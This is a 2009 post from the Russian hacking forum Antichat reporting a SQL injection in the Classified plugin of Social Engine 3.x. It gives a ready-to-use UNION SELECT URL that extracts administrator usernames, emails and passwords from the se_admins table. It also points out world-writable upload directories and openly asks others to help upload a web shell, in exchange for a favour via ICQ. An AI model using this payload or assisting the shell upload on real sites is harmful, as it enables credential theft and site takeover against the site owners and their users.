ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Social Engine SQL инекция !
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Social Engine SQL инекция !
  #1  
Старый 18.01.2009, 16:52
Аватар для eworld.uz
eworld.uz
Познающий
Регистрация: 18.01.2008
Сообщений: 31
Провел на форуме:
114816

Репутация: 13
Отправить сообщение для eworld.uz с помощью ICQ
Smile Social Engine SQL инекция !
В движке Social Engine версия 3.хх на плагине Сlassified есть SQL инекция !

Вот sql инекция :


PHP код:
http://sitename.ru/browse_classifieds.php?s=classified_date DESC&v=0&classifiedcat_id=-1+UNION SELECT concat(admin_username,admin_email,0x3a,admin_password)
,2,3+from+se_admins 
Как залить шелл ? Помогите друзья !

Вот это скрин таблицы se_admins



CHMOD 777 стоит в папках http://sitename.ru/uploads_user


и на http://sitename.ru/include/smarty/templates_c

Помогите друзья залить ШЕЛЛ кто сможет залить шелл стучите плиз на аску 405-801-351 в долгу не останусь
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ